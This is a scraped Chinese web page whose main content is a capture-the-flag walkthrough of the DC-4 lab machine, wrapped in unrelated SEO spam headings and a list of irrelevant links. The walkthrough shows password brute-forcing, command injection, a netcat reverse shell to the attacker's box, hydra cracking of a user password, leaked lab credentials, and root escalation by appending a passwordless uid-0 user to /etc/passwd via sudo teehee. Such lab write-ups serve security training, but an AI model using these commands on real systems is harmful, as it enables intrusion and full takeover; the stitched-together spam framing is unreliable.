当前位置: 首页 > news >正文

重庆网站推广入口广州网站seo优化排名

重庆网站推广入口,广州网站seo优化排名,wordpress编辑器主题,推广自己的店铺推广语攻击机#xff1a;kali 靶机#xff1a;DC-4 一#xff0c;信息收集 1.主机发现 找寻同网段下存活的主机 arp-scan -l2.端口扫描 查看此主机上有哪些开放端口 nmap -sV -p- 192.168.126.136发现22#xff0c;80端口#xff0c;远程连接跟网站#xff08;大概…攻击机kali 靶机DC-4 一信息收集 1.主机发现 找寻同网段下存活的主机 arp-scan -l2.端口扫描 查看此主机上有哪些开放端口 nmap -sV -p- 192.168.126.136发现2280端口远程连接跟网站大概 3,目录扫描 查看网站后台目录 dirsearch -u http://192.168.126.136 好像没有发现敏感信息 二开始渗透 1.用户登录爆破 最开始尝试了几个弱口令没成功一气之下直接开始爆破 打开这个网页 看提示应该是管理员登录用户名直接用admin 使用burp抓包 这里只用爆破密码 字典网上都不少直接下载top5000的字典 查看结果发现密码是happy 成功登录 试了一下这几个选项发现这个是一个命令执行页面 2.任意命令执行 还是使用burp抓包发到repeater 可以看出来这个是通过radio的值进行命令执行 试一下其他命令看行不行试了一下idwhoamiip addr之类的都可以执行 猜测这个应该是没有加任何过滤的任意命令执行 3.反弹shell 因为找到了一个任意命令执行的点所以开始nc反弹连接 先在kali端进行监听 nc -lvvp 6666将burp抓的包中指令的部分改成这个后发送 nc 192.168.126.135 6666 -e /bin/bash 成功连接 发现是www-data用户权限很低 先升级shell交互模式避免意外退出又要重新连接 python -c import pty;pty.spawn(/bin/bash)4.提权 查看其他的用户看看有没有突破口 转到/home里这个是Linux的普通用户的位置 发现有三个用户尝试了一下只有jim这个能打开 查看jim文件夹里边 打开test.sh看翻译大概就是要让你暴力去破解 密码文件应该就是那个old-passowrd.bak 这个应该是曾经用过的密码真正的密码应该就在这里面把这个东西复制到kali里面然后使用hydra进行爆破 这个可能会有点慢要等几分钟可以看到jim用户登录密码是jibril04 然后换成jim用户 su jim输入密码jibril04登录 打开刚刚没有权限的mbox文件 意思是我有一个来自root用户的信所以我们去/var/spool/mail邮箱里面找找去 发现是charles发来的信息登录密码^xHhAhvim0y 切换到charles用户 发现还没有root的权限用 sudo -l 看一下自己有什么权限 发现有一个teehee上网搜了一下 teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权 核心思路就是利用其在passwd文件中追加一条uid为0的用户条目 用户文件格式为 [注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]echo bluechips::0:0:::/bin/bash | sudo teehee -a /etc/passwd按照linux用户机制如果没有shadow条目且passwd用户密码条目为空的时候可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户这个用户因为uid为0所以也是root权限 所以添加一个用户,使用teehee执行写入到/etc/passwd中加入到root权限组中 可以看到这样可以不需要密码登录并且有root权限 5.找flag 去/root里找到flag.txt 结束~~ 三总结 teehee提权通过修改passwd文件添加一个无密码root权限的用户 echo bluechips::0:0:::/bin/bash | sudo teehee -a /etc/passwd
http://www.hkea.cn/news/14369388/

相关文章:

  • 阿里巴巴国际站下载电脑版绍兴网站制作企业
  • 网站提示页面设计wordpress 搜索文章
  • 南京市溧水城市建设集团网站高端响应式网站建设
  • 如何个网站做优化wordpress 导出附件
  • 苏州建站模板搭建本科电子商务专业就业方向
  • 餐饮业手机php网站工程资质加盟分公司
  • 河北邢台wap网站建设wordpress 改语言
  • win2012 iis配置网站最火网页游戏
  • 哪家公司做网站比较好seo短视频网页入口引流方法
  • 广州网站推广自助网站头部设计代码
  • 网站域名备案与不备案的区别网站注册费用
  • 专门做鞋的网站广告网站设计公司
  • wordpress 调用 函数河北seo搜索引擎优化
  • 做毕业设计网站教程怎么做盗版小说网站吗
  • 专门做网页设计网站微分销系统定制开发
  • 免费做外贸的网站空间宁波网站建设的价格表
  • 建材招商网站品牌建设成功的案例
  • 手机网站建站 服务器网页qq官网登录入口
  • 建网站合同做私单的网站
  • 郑州做网站推广外包WordPress信息收集
  • 个人 网站备案 幕布东莞网站建设都用哪个好
  • 国外一些建筑公司网站网站文章后台写完前台不显示
  • 网站内容营销学校的网站管理系统
  • 手机网站 像素软件项目管理项目计划书
  • 苏州公司网站设计网页设计图片为980是参考
  • wordpress 文章的id南开网站建设优化seo
  • 山东济南seo整站优化费用做网站像美团一样多少钱
  • ssl外贸网站网站建设制作设计营销公司南宁
  • 网站关键词搜索排名优化手机如何强制下载网页视频
  • 网站建设见站分析和准备论文计算机网络 网站